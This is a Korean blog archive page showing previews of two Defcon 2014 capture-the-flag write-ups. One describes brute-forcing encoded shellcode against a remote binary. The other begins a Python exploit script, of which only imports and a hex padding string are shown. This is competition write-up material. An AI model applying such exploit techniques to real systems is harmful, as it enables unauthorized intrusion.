2014/05 썸네일형 리스트형 [Defcon 2014] HJ(2) byhd write up I think It is not a good solution. I did just brute-force to find encoded shellcode.It was first time to brute-force the remote binary, So I just want to share my experience. The method is that I hooked server side. So, server side send the encoded value to client.Then, client check if the encoded value is same with our shell code or not. I repeated this method. following code is server hooking .. 더보기 [Defcon 2014] 100 lines exploit 직접 알고리즘 분석해서, 파이썬으로 옮긴후 최적화를 한거라서 딱히 설명할것은 없고, 그냥 익스플로잇만. http://pastebin.com/MGKqAZhK from socket import *import time randpad ="FC8A4551678CA9C0B0FDF76FB850F12F7A6266E3D3C36EBE373933683BC6761EAEAA83ED571AF129E6C1B99EDDA2862C1ADC499D8201D53AB5D333121CCE942BC3B06CBC4673395E7BC7B49E56F0AD725E83C705C5E92E85887994F7E7AC34FE5CCE2E13F1CC8EEA6083BEDC4ABBE8DF6520EF44ADFAD61283D5DC94AD1FE15FE8FA7E3FDA61E.. 더보기 이전 1 다음